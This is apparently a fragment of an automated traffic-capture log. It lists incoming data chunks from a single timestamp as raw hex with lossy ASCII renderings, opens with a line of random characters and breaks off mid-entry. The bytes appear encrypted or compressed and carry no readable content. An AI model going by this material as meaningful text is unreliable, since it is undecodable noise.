G;~j:[fz6{4IBRC7(pA_AlK!io81>`Dw4yR"VP6EEnWdz}?e!,X3=3K+Z9jI x
2022-11-07 22:49:09 UTC	9641	IN	Data Raw: 9c 03 23 c8 48 73 77 9e 3f 37 27 89 82 39 fc 2c 6c 50 dd c2 03 55 64 53 e6 57 f9 25 5c 27 3d 4a c0 aa 28 8e 75 24 6c 11 94 11 34 02 aa bd bb 24 a7 bb d8 04 2d c4 b3 06 f0 4e 0e 72 a0 d4 27 ef b9 b8 b2 00 d0 b0 72 b2 62 97 14 3b e7 a2 c6 32 e9 a7 97 73 3e 90 76 6c 75 93 de a5 4a 63 4d 37 a2 fc 4d a7 d1 b3 1c 5f d5 ec 4d 7a e1 b3 c1 5e df 4f e1 33 40 fa 6e ae fe 36 00 79 06 e4 6d c5 ad 4b 14 5a df ef f5 77 60 d9 81 d8 47 4b 4b a4 10 60 2b 56 29 05 c1 03 5a 05 c6 d1 bd 29 9d 87 0f 96 c2 99 db d2 b6 82 ea 66 9c 17 8a fe 8f 3f 88 60 b7 a6 f2 15 14 76 38 c8 ff da 21 0a 33 16 8a b8 39 34 db e8 80 6f da 38 9e e5 2b 5a 6f 60 be 86 9e ae 7a eb 42 2a a7 87 a8 b0 23 fe 9a 8b 35 3d 3c 95 cb cc fc 44 9a 55 fe e5 5e f7 ed 55 58 37 76 54 31 9f 88 7b fb 7e 1f 69 c0 27 36 Data Ascii: #Hsw?7'9,lPUdSW%\'=J(u$l4$-Nr'rb;2s>vluJcM7M_Mz^O3@n6ymKZw`GKK`+V)Z)f?`v8!394o8+Zo`zB*#5=<DU^UX7vT1{~i'6
2022-11-07 22:49:09 UTC	9657	IN	Data Raw: 98 d3 e5 ab 7d 04 32 c5 f3 fb c1 d6 e8 c8 7e 68 13 b1 b7 5c b7 79 7c 6b 69 68 41 7c dc 9b 7e 28 44 56 39 2e d5 6a 46 fa c3 d5 d7 c5 56 7a e4 21 27 db d6 07 91 8a 2e ac 68 47 4e 23 c1 43 e7 17 83 58 a8 26 a0 56 cc 52 fc 2f 25 9a 70 11 aa 44 0c 96 3b 04 31 30 c4 16 ec cd 15 b4 15 e0 88 d6 ca f0 f7 11 30 54 30 27 a9 99 0d bd 33 8d 74 a3 59 79 40 ad e2 8b d2 cf 1c 89 c6 c9 b6 02 69 17 f8 8a c9 05 fe 8f 51 e3 1d 2a c1 1c d5 07 4b 39 43 04 b6 d4 86 be 44 e1 16 3f 60 3e fb b6 56 51 66 c7 56 77 1c 3e d3 7a 49 02 47 b7 2b f3 5f da 5a 17 1a 58 f0 26 60 24 a2 fb 8c a1 87 ce b0 90 df f2 34 5a c7 24 df e4 c4 a9 09 6c 42 4e 72 a4 b1 8d 8b 10 c9 2e ba 8e 89 39 54 ac 0d a2 c0 f0 cb 27 e1 97 b2 07 c2 ad 02 17 c3 fe b5 c1 7e 26 11 8d 68 d7 2c 6e 48 5c a4 3f fd 0f c9 34 83 Data Ascii: }2~h\y\|kihA\|~(DV9.jFVz!'.hGN#CX&VR/%pD;100T0'3tYy@iQ*K9CD?`>VQfVw>zIG+_ZX&`$4Z$lBNr.9T'~&h,nH\?4
2022-11-07 22:49:09 UTC	9673	IN	Data Raw: 2e 2f 8f 7b fc 5c 14 3c 05 93 ec 37 ca 97 66 ca 2c 0a e0 5e 4c 2f 77 a6 4c ce b1 6b 64 8a 0a 11 ce 54 c7 57 48 01 25 68 27 fd 73 f0 df e2 6d 1d ff a5 9a 9d 13 bb fc fd 07 b7 7b fb 68 a7 69 69 0f 87 78 e1 4b 42 a7 80 69 08 8f 29 51 84 4f 47 82 ba e9 41 82 e9 05 86 f6 d8 4b fc 8a 5a 07 c6 3c d2 05 20 37 60 d7 f6 da 99 c7 91 63 5b 91 b3 37 02 72 4d 75 2b 16 15 22 47 83 04 75 16 54 62 08 8d ab 76 9f 18 db 6e 58 8e 00 56 c2 02 4d 3d 71 59 3e d1 c2 54 1a bc 48 e9 e5 f2 df f7 06 50 c2 f8 40 ff e0 75 17 15 dc f9 a8 79 66 de 4c d2 ad bf f4 61 d4 c9 e9 2f a6 c9 3a 48 6e 55 72 75 74 8c 89 95 33 e8 9a e7 72 8e 42 05 14 b6 9a 79 16 a2 61 e9 44 e9 ad e5 b2 ca 5b ee dc 92 c8 13 0e a7 5c 24 77 5a 0e b2 c4 26 53 6e cd cb b2 80 83 4b 15 ab d9 83 39 87 5b c9 34 c0 1f f1 cf Data Ascii: ./{\<7f,^L/wLkdTWH%h'sm{hiixKBi)QOGAKZ< 7`c[7rMu+"GuTbvnXVM=qY>THP@uyfLa/:HnUrut3rByaD[\$wZ&SnK9[4
2022-11-07 22:49:09 UTC	9689	IN	Data Raw: 66 f7 2c cd 45 ec cf 01 15 1a 0b d7 8a 74 5b 95 57 05 eb d6 b2 3a 93 a5 1b a9 de fb 00 00 2a f4 a4 50 33 9a b1 77 fd 31 95 af 39 01 5b 99 dd 17 54 9f 41 2f 1b f7 e4 79 7f c9 61 ac bf 1d 06 9e 5f 4a bd 16 ea 75 44 32 fb 3a ae b4 4f 62 f1 8d 46 a9 a5 e5 87 49 aa 3d 0e c3 20 fe dd a9 37 23 24 45 43 08 db e6 e5 7e 9c 7c 47 47 62 6c e6 d6 ef 4c f5 de c9 c6 42 05 2d 73 66 d4 b0 47 55 40 c7 d7 76 b7 11 0e 5e eb cf 7b f1 b5 48 1a 4c 73 c0 a6 a7 e8 21 67 d1 c0 b6 45 59 38 2f ea 65 2d c5 db b8 bc c9 f2 6f c1 79 bc 25 cd 44 7d 8e 07 5e 6a 00 29 2c 41 6d a9 88 15 05 13 2a 22 82 3f 85 49 c8 2f 4b 6c 9e 52 44 ad f9 40 ef 80 35 30 3d 12 68 68 a3 8c ec 43 87 19 e4 f7 e0 b3 78 b0 89 86 65 74 64 f8 1d f5 3b 96 86 79 f6 4d 3b 01 d3 3e fe 27 99 a3 3f 52 55 f3 9f 0d 63 bf 00 Data Ascii: f,Et[W:P3w19[TA/ya_JuD2:ObFI= 7#$EC~\|GGblLB-sfGU@v^{HLs!gEY8/e-oy%D}^j),Am"?I/KlRD@50=hhCxetd;yM;>'?RUc
2022-11-07 22:49:09 UTC	9705	IN	Data Raw: 95 1b 5a bb 96 4b 10 82 2a 45 92 d3 6c d5 a8 f2 e6 2f 43 16 1e 58 07 c8 8d c4 43 b4 3f a5 9a 20 7c 03 94 d3 a6 63 cc b8 b9 dc 88 f7 8f 63 ee a5 23 58 53 3c b3 e2 c5 73 1e e5 9c 22 20 a3 e7 83 82 83 6c f8 1b cf d2 19 e7 35 14 cb ce 5e 3b 7b 4f 3c 3e 60 5c 21 51 46 16 df 75 76 d4 4c be db 65 17 a3 3d 6e a9 83 a6 c8 ff 14 85 e7 d3 01 12 ee ed e5 f3 ec 35 52 b8 b1 f0 b0 1e 77 70 e3 dd 1f ce b3 c0 ba b0 d3 ce cc b6 84 e5 54 c6 bf 5e 6c 12 76 21 7d 97 d9 87 7b d2 43 c6 e7 2f d4 98 b8 40 ec e6 f4 66 7a 6c cb 54 12 4a 8e ff ed 0a 26 db 70 19 e3 c8 32 aa 96 07 d0 51 db 51 78 fc 89 24 50 d1 0f 92 d6 01 b9 eb cc 29 ff 0c fa ed 52 99 f6 10 42 fb d5 53 e6 d2 0b da 2e 5b 72 61 75 64 92 7d 16 56 aa 17 9d 8a a7 c8 1c 7b 85 9b 11 0f 5e 8b 77 9a ff 29 58 90 71 71 eb 6a 9b Data Ascii: ZK*El/CXC? \|cc#XS<s" l5^;{O<>`\!QFuvLe=n5RwpT^lv!}{C/@fzlTJ&p2QQx$P)RBS.[raud}V{^w)Xqqj
2022-11-07 22:49:09 UTC	9721	IN	Data Raw: 5d 4b bc 54 82 99 0c 51 0d f3 44 f3 14 88 1d 8b 71 02 8d bd 99 db e5 fb 24 df a2 b4 eb 80 08 6f d6 83 c3 38 ab b3 dc bd e0 e9 82 f3 8a 93 d0 af 11 6b 94 5d 95 8b d0 9b 2e 04 bb 49 8d 02 e4 c3 54 16 97 45 00 a0 8f 92 d4 89 41 e9 69 26 93 08 00 c2 45 42 2c 35 99 50 85 6f 44 37 fa 58 d0 29 7f 76 2d d0 76 17 2a e7 75 ea db e7 f6 43 2f d3 f3 10 28 55 80 b8 fa 27 fc 5b 81 cf d8 7c 57 0c 0f 76 e5 6d 5e 27 a6 97 d6 33 50 ac 93 c3 bd 87 db 71 39 a8 5d e0 2a 98 93 ca 2d 36 8e 84 52 c4 84 6b d3 32 ba 7e e0 34 74 8a 19 2f 01 1a ca 2c e9 5d 20 21 a6 72 bc 8c 40 ab 61 b4 18 2f b1 94 79 bb a9 62 41 83 57 23 59 82 48 40 fd 50 10 04 30 8a bd 6f 74 4c b6 20 e1 4a c6 ae 6d 6c d1 c8 e6 5f bb 32 40 73 1c 2b b2 af d5 54 0b 1d 70 3a 87 7c ef 4f 5a 76 8a 99 2d 01 62 c3 96 02 3a Data Ascii: ]KTQDq$o8k].ITEAi&EB,5PoD7X)v-vuC/(U'[\|Wvm^'3Pq9]-6Rk2~4t/,] !r@a/ybAW#YH@P0otL Jml_2@s+Tp:\|OZv-b:
2022-11-07 22:49:09 UTC	9737	IN	Data Raw: 97 c2 0a 38 00 2e 33 16 1b 56 6c 90 d8 0e 51 db ba c6 2f 2d b3 98 6a 1b d3 70 0d a0 50 17 1c ca ce a3 6b 4a 26 24 c4 35 15 58 40 a3 12 32 14 c0 99 0b 4b 47 cb 51 97 39 e5 54 35 f3 00 9d a8 ae d3 10 56 37 7b 09 62 d1 2c 41 47 fc ff 55 e4 95 57 85 82 22 3f 35 ee c7 f9 7f bf 12 3d dc 86 55 19 cf 3a 6a af 30 8c 43 09 c5 8c 8b 8f 0f 2d 66 cf 34 d1 f5 cf 0a 4a 9a 60 d1 69 0a 4a 0e db c3 06 1b e5 a6 f1 9e 80 80 92 3c 28 04 95 88 44 5c b8 7e 12 1c f8 89 2e 5c cf ab cd fb b3 ba 78 da 67 31 87 74 f3 a3 9f a5 1a ce 93 3a c9 f8 d7 8b 05 09 50 ff c5 bd b2 1b b0 b4 64 b3 42 33 5e 35 13 4d 48 fe 76 c5 31 06 75 bc 42 60 06 94 13 34 11 a9 f6 e4 a7 4e 9b f8 3f dc 57 89 e6 54 98 09 ff 9f 2b 8e e8 f1 fe 20 bb cc 5d e7 37 2d 9d f9 c4 74 51 77 ec ed 55 7b 7f 45 9a 85 29 b9 ec Data Ascii: 8.3VlQ/-jpPkJ&$5X@2KGQ9T5V7{b,AGUW"?5=U:j0C-f4J`iJ<(D\~.\xg1t:PdB3^5MHv1uB`4N?WT+ ]7-tQwU{E)
2022-11-07 22:49:09 UTC	9753	IN	Data Raw: 69 22 b6 b3 99 2e 74 e9 78 71 dc 15 36 f9 25 94 77 4c fb df b3 dd 7a f1 6f 21 71 0c 7c 26 58 06 7c 8a 10 ca bd 15 35 13 39 f6 c0 25 29 29 9c 75 92 75 cd 3b b1 4a 3a 4b 22 37 cd 5f 11 a2 97 37 d1 60 ad e4 a6 7a 38 98 d4 a1 fb 16 ff cc 4e 53 fb 44 65 2b 25 9d 77 b8 31 03 94 cd 2c 2f ea 25 a2 6f 91 5b 87 53 22 60 88 8a 31 9e 2f b0 f2 45 4a 08 c0 a6 2a 25 3e d9 6f 51 8d 75 53 a4 fd db 6f 60 1e 4d bb ba c1 db 3f f8 6f 07 19 7a 05 b0 30 94 7d a1 56 a7 43 f5 35 e2 4d 13 1f 71 d5 cd b2 b5 bb 4b 81 9a 2e 31 0a 76 7b 91 49 cf 83 74 cb cf 5f 6d 1a b5 86 6b bd 72 a2 21 0e f8 33 05 97 e5 80 ed 34 99 4b c0 19 7a 97 5c f4 44 2b f3 c4 a7 a2 18 ec b8 7b ce c4 e0 d2 d5 8a 58 c0 a5 88 e2 8c e0 cb 5d d6 a4 da 4a 28 e5 88 bd 4a 8a ce d8 19 fb 55 17 08 3a 63 22 0a 31 5f fd 02 Data Ascii: i".txq6%wLzo!q\|&X\|59%))uu;J:K"7_7`z8NSDe+%w1,/%o[S"`1/EJ*%>oQuSo`M?oz0}VC5MqK.1v{It_mkr!34Kz\D+{X]J(JU:c"1_
2022-11-07 22:49:09 UTC	9769	IN	Data Raw: 29 e4 8d 3d 00 54 b3 4a c9 5b 10 6b 08 5b 2d cb ee b5 3d 63 69 e8 00 f5 3b e2 13 87 26 fe 68 d9 bf ba b9 4b 69 f2 d4 9b d1 3a 5d be 10 53 8c 40 6c 22 81 56 58 e6 5e bf 73 d8 ac 14 74 ae 2c 26 27 11 3d 44 0d 03 27 54 c2 bf b5 16 5d ab 5a 82 df e9 81 eb 07 fa f2 21 25 88 66 a5 68 03 4f fb 7b 81 f4 ad 64 30 0f ae fe ac 4e 99 62 2a 5d fe 7e d3 47 be e6 75 de 13 c9 16 6f 8c 7f 45 f0 52 34 f7 a9 bb 1d ea a7 27 1f a9 13 5b 00 f5 b7 92 9f 85 c8 23 c3 7d 4b 5b 67 66 64 cf 88 a9 eb 4c d1 2b 9d e3 7b 50 5d 73 96 56 c5 3b 62 06 24 64 0e 1e 62 97 c0 15 25 43 02 ea f7 5e f2 97 26 0e d7 82 d4 52 7a 04 c2 99 f8 7a 50 0a 9e fe 81 37 2f f8 06 05 c9 54 23 64 70 57 64 3b a3 93 a7 73 57 9a ea 0a 1a 14 df a7 40 e5 9a e7 56 ca 25 59 56 d1 56 44 b8 89 22 f7 3c 2b f8 e5 9b 9b 98 Data Ascii: )=TJ[k[-=ci;&hKi:]S@l"VX^st,&'=D'T]Z!%fhO{d0Nb*]~GuoER4'[#}K[gfdL+{P]sV;b$db%C^&RzzP7/T#dpWd;sW@V%YVVD"<+
2022-11-07 22:49:09 UTC	9785	IN	Data Raw: 46 83 69 7f ac 9d 3a 2b 90 59 b8 87 0d b8 74 41 4a b5 a8 94 b5 8d 9a e6 f5 46 88 c9 6f 25 39 b6 10 31 7a e3 e9 8b 5a 99 20 0a f5 e6 f0 76 ba b8 e9 c7 56 be 8d ef f5 12 5e 30 c1 9b bf ca 70 50 bb c3 eb 5a 7c 45 8a 2d ac 93 ad f6 e6 a0 f2 7d 28 d6 9b 94 6f 84 53 d7 8f 7d d5 03 1e 56 05 e4 4d 55 8c 86 44 c1 b5 ac fd ad c3 55 fe 7e 8c 8f 6f 4e ce 2d d7 07 cb ee 78 87 9a ad 99 e6 1e d3 6d 74 ea 5e 88 b3 4a db f9 58 bf 71 4f a5 80 73 51 18 0a a1 bc 10 34 80 38 b3 e5 0d ff 79 e6 64 b7 b3 c4 fd 62 60 73 e3 0f 54 f5 51 5f e4 95 15 a8 3a 62 b9 27 1c 78 a1 91 de e5 bd 5f 2d 8a 1a a5 e9 61 41 59 b0 71 5e 3a 2f 05 50 44 89 e4 f0 3b cb fe be fb a9 e6 d7 5b 5a c7 04 93 72 9c e9 44 d3 25 9c 4d c1 64 be 0e 6c 8d cc 67 3e b4 64 c8 20 cf fc ed 75 77 14 fd f6 ef 25 46 31 42 Data Ascii: Fi:+YtAJFo%91zZ vV^0pPZ\|E-}(oS}VMUDU~oN-xmt^JXqOsQ48ydb`sTQ_:b'x_-aAYq^:/PD;[ZrD%Mdlg>d uw%F1B
2022-11-07 22:49:09 UTC	9801	IN	Data Raw: a9 33 76 33 83 e5 ed 2c 74 37 5d 86 d7 19 e3 f8 2b dd 06 cc ad 20 98 8d 91 37 52 86 bf 64 04 e6 46 49 2f b9 f2 83 3b b4 56 15 5b b7 3c 33 be 84 66 7a 19 e2 a6 aa 6c 83 76 9f 04 73 6a e5 3f 4e 3f 35 06 16 8b 02 ae 52 08 cb c0 ea d4 75 88 5d 33 3d 36 ba f2 35 e4 05 58 b3 92 a4 a6 4a 3f 6d 57 3e 8d bd ca 1f bd 2e 30 6b e5 af 0b e0 34 a1 de c7 49 65 9e 73 13 f9 86 10 54 49 40 04 66 d8 fa 2b 81 19 e2 3c fd 27 a6 2e 74 89 3f 2b f2 c8 1e e8 0c e8 c5 bc 21 f2 b7 8a cc e3 c7 3b 5c 93 67 0f 96 bb 56 11 2c c5 eb d0 56 e0 02 5f 34 73 fb 20 22 57 54 ce f7 60 27 ec 62 63 4f a1 6e cc af 20 13 4a 0e 65 69 ca 6d 23 1e 67 5b a4 4d 8e 16 46 d0 b2 21 d4 1b 68 2b 73 75 2b f9 5e a8 f7 ee a1 6a ac e6 8d 2b 4b 9e 17 d9 24 c3 5b f0 84 d2 20 f6 66 b7 7d 42 1a 4b 67 99 34 55 71 b8 Data Ascii: 3v3,t7]+ 7RdFI/;V[<3fzlvsj?N?5Ru]3=65XJ?mW>.0k4IesTI@f+<'.t?+!;\gV,V_4s "WT`'bcOn Jeim#g[MF!h+su+^j+K$[ f}BKg4Uq
2022-11-07 22:49:09 UTC	9817	IN	Data Raw: f3 82 b8 34 f9 b6 e5 ab 97 57 4b e2 e7 b6 d9 76 12 91 55 0e d1 18 01 f9 53 89 4c 4f b8 f3 ba 21 19 2c 7c 8c 53 91 96 e1 ae 37 e7 fe b1 96 ee 85 c3 d8 96 aa db 1d da 09 4f fd 1b fa 75 0c af bc c1 95 8f 46 9c 9a 86 cf 96 07 79 c8 c6 02 86 ae f6 6c c1 b0 f8 57 cf 6f c7 53 48 7d e6 14 f1 a7 83 15 20 fd 77 b0 f7 14 e7 18 a7 5d e6 d2 53 23 01 2a 4f 24 e8 c5 d7 f9 78 5a 2c 07 10 e1 83 6f 34 b2 af b5 60 82 42 b8 3c bc 9c fe de d3 17 31 08 09 9e 5e cb 71 bc 0a c2 94 d7 32 b5 ac 25 69 16 92 d3 09 45 b4 37 2d 73 d2 5f dc 83 70 49 02 2c ce e8 db 6b 25 d3 fe 85 11 3d 83 4f 51 c7 8a 1a 80 d6 42 82 64 95 50 97 2e ba 8f ca fa 7f 44 13 14 f0 c1 d6 1f 41 20 73 c3 b5 ba 7e 57 14 4b 7e a1 74 04 45 a1 9d 79 25 c4 c7 6e cf e5 86 9f 00 51 b2 00 29 8d 6d b8 b7 63 4f ad dc 2c e3 Data Ascii: 4WKvUSLO!,\|S7OuFylWoSH} w]S#*O$xZ,o4`B<1^q2%iE7-s_pI,k%=OQBdP.DA s~WK~tEy%nQ)mcO,
2022-11-07 22:49:09 UTC	9833	IN	Data Raw: b5 b2 07 a6 5f b7 91 9a 59 2f da 45 66 6b ba c4 2b cb e1 46 23 f1 5b 29 9d d5 06 87 bd a2 d6 e7 c2 14 c4 57 ba 94 8b 32 6d 88 31 6d 25 26 c9 bb e4 33 90 c7 d0 6f 51 a8 89 c6 e6 9b 7e 8a 63 3e c7 92 9e 28 0d eb fe b6 86 93 13 6a 53 1d f9 b8 0b 73 21 e3 2b 2f c7 76 6f c6 4d e0 66 ed d7 af 6b 98 81 fd 1f 4c 7e 1f 01 cb c9 3a 90 06 b5 c4 a5 9a 19 fe 3c b5 67 1b 52 87 43 11 97 fb 24 3a f2 67 cc 24 0e 3b 0b d2 06 13 ef f8 a4 a6 8a e2 ff 3f 33 2b 32 3c 5d 5d bd 19 99 a9 ff b8 57 16 5e 0b 1f 48 3f d6 c7 19 bb 87 a9 3f 41 84 73 5b 70 05 b0 0f 71 7d 17 a8 f4 ee 01 8b c0 63 6c 73 35 6d e3 0c 2c 67 3f ae 8f 9a 6e f2 b7 0f 21 68 ba db 0d 0d d8 26 87 c0 49 64 29 a6 4f c5 54 d1 52 41 d1 18 08 78 25 50 71 39 c4 6a a1 76 80 17 9d f1 23 21 18 50 93 83 30 7c 2c 38 2e 6b c5 Data Ascii: _Y/Efk+F#[)W2m1m%&3oQ~c>(jSs!+/voMfkL~:<gRC$:g$;?3+2<]]W^H??As[pq}cls5m,g?n!h&Id)OTRAx%Pq9jv#!P0\|,8.k
2022-11-07 22:49:09 UTC	9849	IN	Data Raw: 05 6b d7 69 11 2c e6 86 4a fc 32 27 29 d4 e4 da 8a ee 07 8c fa 95 b2 b1 e9 5d ab 80 35 ef b3 e3 e3 fc 69 55 d5 a7 b9 2a 8e d1 bb ff 1e 30 9b f1 b2 c2 a9 44 9b 83 b2 9d 55 60 31 f1 7e 8b 09 25 58 c5 5c 48 b8 03 3e 83 a0 13 f6 ac a6 90 43 4c 12 03 c2 ef 8a 9a 6c 8a 20 e2 5f 57 4b 6b f0 6c be fe 4f f3 de 48 6e c7 d1 17 89 7f 3a 45 0c 4c 06 3a 78 d5 be 96 35 43 2b 1c 79 a4 87 0f d7 de 67 23 60 36 19 c5 d1 08 70 7d 62 f0 70 4a 69 78 92 18 1f db 41 a3 b6 ac b0 a7 3a 79 ba 7d 30 b4 a8 37 7a a5 cf 53 27 b3 47 fc 03 5c 79 03 64 58 6e 7e 56 61 fb 72 83 d7 a0 c1 70 5c 59 ca ed 82 1d 7b 8a 83 36 87 0d 8a f3 7e 27 bc 28 37 d4 11 13 52 78 f4 51 db 66 83 05 d8 ce e5 80 1c 1e 67 51 eb 26 5a 9c 46 74 12 a5 21 1b 8a 66 ee ea eb c5 7a d8 ce 68 66 e6 2a 8c d5 42 ff 55 67 5e Data Ascii: ki,J2')]5iU0DU`1~%X\H>CLl _WKklOHn:EL:x5C+yg#`6p}bpJixA:y}07zS'G\ydXn~Varp\Y{6~'(7RxQfgQ&ZFt!fzhfBUg^
2022-11-07 22:49:09 UTC	9865	IN	Data Raw: 6b 9b b1 c1 fd 35 a0 32 09 36 92 42 67 05 e6 6d ab f6 75 a3 2d 84 b6 6a 5c 5f af 4b a9 bf 67 68 8f 72 d7 d8 b4 78 36 94 8f b9 f1 cd 2f a5 60 6c 7b fd 7d 2a fb c8 67 35 f4 d3 e8 27 8e f6 e6 3c 86 c7 e7 c9 d0 67 b5 5b 68 f8 45 79 16 46 4f 73 37 d3 a2 64 da ac e6 a3 70 0f a1 a7 67 df 5e 62 46 a1 bb fe 48 3b 29 32 ec 59 a6 bd b6 68 3a db ab ae c4 00 c5 76 3e a6 51 98 0b 2c 3e 3c 5e ac 2e 26 55 4a 59 b4 fe ed 83 3f ab 20 2e eb ea c2 78 91 c1 e9 34 ff d3 32 0e 4c 30 9d d8 51 24 26 0c f2 65 bf fe 65 7c ee e0 fb ad 6f d6 98 d2 34 71 60 42 65 b3 20 68 e6 ac 7b d3 49 cd ab 3e 46 d2 af bf 98 f7 e8 6a 97 a3 9f f5 18 4b 47 77 43 ba 1e 44 7c e0 48 fd 12 15 3f 28 41 48 00 19 20 51 11 62 34 d4 bb 54 67 5b ec 5c 1b d6 8f 15 7e fe a7 25 32 2c 39 c9 d9 1e 0f 34 dd 12 fb 54 Data Ascii: k526Bgmu-j\_Kghrx6/`l{}*g5'<g[hEyFOs7dpg^bFH;)2Yh:v>Q,><^.&UJY? .x42L0Q$&ee\|o4q`Be h{I>FjKGwCD\|H?(AH Qb4Tg[\~%2,94T
2022-11-07 22:49:09 UTC	9881	IN	Data Raw: ac b1 f9 ff c4 1f 03 8a d2 cf 9c 40 df ea f3 16 16 b6 7c a6 37 0d e0 57 be 4a 15 76 15 40 b6 82 b8 1d 57 76 2c 9b 35 ed 8a 3b e4 55 28 76 f2 70 3a 30 cc e3 d4 a2 f4 61 ac 08 c3 5b 8c 2c c3 64 33 d9 d4 1b 68 67 4f ec c0 3e d0 38 e5 8d 46 44 63 35 d1 ae ab 29 29 22 52 6d 72 11 fb 5d 24 16 40 3f cd fc a5 be 70 f6 85 ae 73 b3 e1 35 74 07 a3 46 c4 7a 7f 38 e7 66 c0 c8 70 52 75 4a 54 7f 25 a4 08 8c 36 23 4d 6a 20 15 04 03 3f a0 d7 aa cc 52 86 a5 42 2f 13 57 71 9f 93 38 40 e8 c3 bc 79 6b 00 26 f7 95 2c 3e b6 10 78 b6 f5 ae 63 bb 1e 2c f2 e3 b9 13 59 e0 e5 22 53 2d d4 59 b2 76 2a fd 97 61 9d 03 a2 8a 7d 3a 9f c6 a2 26 87 57 b9 23 3d 8a 22 73 72 62 39 c4 c0 ed 4a 83 20 09 16 31 96 cc 01 f2 0c 20 94 c0 11 44 fc 17 65 85 0b 26 83 3a c7 40 48 1c 59 9f 32 bd d0 c6 d5 Data Ascii: @\|7WJv@Wv,5;U(vp:0a[,d3hgO>8FDc5))"Rmr]$@?ps5tFz8fpRuJT%6#Mj ?RB/Wq8@yk&,>xc,Y"S-Yv*a}:&W#="srb9J 1 De&:@HY2
2022-11-07 22:49:09 UTC	9897	IN	Data Raw: 96 1c 46 d9 c6 ab 84 d6 de e8 56 05 83 93 da 58 32 fc 1f a9 f2 33 41 72 03 27 bb ac 1e 48 bb 20 e3 3d 08 35 c9 d7 fd fb 6c bf 85 63 aa e2 bb 91 fc e4 d0 e7 1a 58 55 64 85 63 a7 7c 93 9e bf fe 2b 84 f9 57 b7 ae 34 ce 99 6e 64 b1 b6 56 70 12 57 44 83 61 7b be 39 42 1c 58 a7 54 44 63 83 c5 1b 20 9d df 8e 30 42 84 e3 0b 39 e8 8d 2b d9 5b 87 37 61 d8 be 0d 43 db fa a4 26 9f 2d 9c 9a 82 07 85 61 be d5 20 94 fa 34 64 11 84 03 e1 c8 f5 14 8c cc 28 b0 85 72 e9 a1 33 6a ac 57 07 fd 4f 38 05 8d e5 d8 ff 57 6b 35 58 2c 01 02 bc c3 ae fc a7 d4 4e fd ab 53 5f 51 1e 0b 57 05 d5 37 d1 78 ba a5 90 93 a7 a0 2f 72 47 5f 61 44 5b 4d 02 e7 62 8a df 5c da 59 26 01 41 83 2e 75 f4 33 d5 bf 85 04 43 ae 46 3b 04 3e f1 8b af 31 67 0d c1 a2 e1 da 9c bd 2b b3 10 1f 65 b7 e0 6e 5a 9d Data Ascii: FVX23Ar'H =5lcXUdc\|+W4ndVpWDa{9BXTDc 0B9+[7aC&-a 4d(r3jWO8Wk5X,NS_QW7x/rG_aD[Mb\Y&A.u3CF;>1g+enZ
2022-11-07 22:49:09 UTC	9913	IN	Data Raw: 96 37 58 f1 48 4c d3 59 3e 90 74 f5 6e 42 9a 58 63 6f 1f 81 10 dd f7 97 0f 77 ed d7 d8 6a 38 4e 97 1f 86 22 70 87 9f fa aa 67 97 c0 7c 98 74 b8 0c a1 16 ff 83 85 4a 82 38 ac 45 d5 ed ab db 07 df ad 79 fa 9b d8 0f 26 9d 51 87 4c b8 09 2a 51 60 57 f5 f8 11 43 23 83 33 fc 41 a9 6b 4d 0d 27 b6 22 26 a1 f3 cd 82 8a 81 4e f0 09 32 e6 a3 fc a5 da e9 ab 62 85 ba 59 b5 9b 19 e4 20 29 26 09 92 b3 93 81 f3 ba f3 fb d5 cb 92 cc 43 d9 46 40 59 08 40 bd cb 6d 5a 17 60 12 2e 52 de 60 0e e6 c0 c6 29 e5 25 e6 c1 5b c6 af dc 0b 13 0a 8f f4 01 c4 a2 31 81 60 a9 68 a2 7c 92 05 e6 60 d5 2c 27 69 91 0c f6 f5 2c ff e7 3a 6f fb 7d b1 41 e5 66 40 25 9c 05 d9 ae 9e 4a a4 ff 20 97 a8 a9 bb fc d1 f8 f1 17 49 15 67 24 11 5d 20 00 9b 07 9e 35 d6 2a 95 00 45 64 38 d9 3c 3c 2b 70 7c b3 Data Ascii: 7XHLY>tnBXcowj8N"pg\|tJ8Ey&QLQ`WC#3AkM'"&N2bY )&CF@Y@mZ`.R`)%[1`h\|`,'i,:o}Af@%J Ig$] 5Ed8<<+p\|
2022-11-07 22:49:09 UTC	9929	IN	Data Raw: 4b 87 17 a6 9b 9c c8 e8 65 db 81 5c d5 94 91 23 f0 bf 95 63 6e 20 6c 0f 84 e3 e1 33 db 3e c9 89 21 4c c7 9d 35 50 f8 aa 6b df d8 f8 b1 e1 8b 02 a5 98 0b 71 c5 57 f9 09 2e ec 6a 0b d8 20 60 fe ae 3e 56 58 01 41 c5 45 91 ba 4b 4d 1e 7d 97 52 f2 a8 8c 35 ff dd f4 03 28 a6 1a 23 08 a3 a0 a4 a7 00 6f fb 8e d4 54 5e 37 c3 91 b7 bb 7f 7e bd f1 b5 10 d4 57 eb f9 b3 85 f1 09 30 21 63 26 d3 20 e8 9a cf 48 61 52 48 85 ef ad eb 7e 86 85 c3 22 da 98 c1 bf ae 36 e4 5a 59 54 09 4e c7 90 35 85 3b 7a 66 ec 99 39 16 f3 8e ca cf 26 df 1c 11 63 22 6f 15 f4 82 13 6f 9d d1 48 c5 34 af 50 26 66 9c 11 3e 70 e1 48 a0 dc 11 92 6b 01 2f 97 98 fc 47 97 65 66 bf bb 90 f0 d9 66 97 3f 35 a1 57 2b b5 34 87 fd 23 16 0d 0e af fd 36 57 b6 ef b8 fe 56 71 19 bd 74 0a f4 b1 a4 b8 24 b7 09 6b Data Ascii: Ke\#cn l3>!L5PkqW.j `>VXAEKM}R5(#oT^7~W0!c& HaRH~"6ZYTN5;zf9&c"ooH4P&f>pHk/Geff?5W+4#6WVqt$k
2022-11-07 22:49:09 UTC	9945	IN	Data Raw: a7 93 bb a5 2d 50 68 3a e5 47 cc 93 0e d5 1d 0b 9d 9f f4 fa 36 9b 9b 92 24 27 d1 e6 55 e9 38 8a e2 c6 0e 38 29 ce 21 93 47 db c4 23 18 43 d5 9e cd 0d b4 2a 41 18 e9 2e 49 c5 ab 08 5b ac b1 0b 39 fa 60 a0 5b da fe b6 d9 80 27 cd bc 7b 03 e1 b8 b0 83 e0 d1 1a bd 95 68 85 b2 21 c2 bd d7 6f 5a cc 54 f6 e1 13 9f 83 5b c4 2a 20 4f 28 2c 0a ed 2f e6 d4 3c 3d 93 00 b0 7e 59 a9 df d6 e5 7d 17 b2 40 e0 e6 52 d9 b6 15 0e 70 f8 05 c6 77 6f 8d c5 a1 b9 12 0c 55 99 7c e1 58 28 a1 85 ca 59 fd 6c 54 b3 c8 c4 6a d1 11 95 43 48 f8 49 12 7b a2 3f e4 6c 7d 04 b2 66 85 b4 dd 4a b4 65 22 30 b3 5d 9c b9 9c 1e 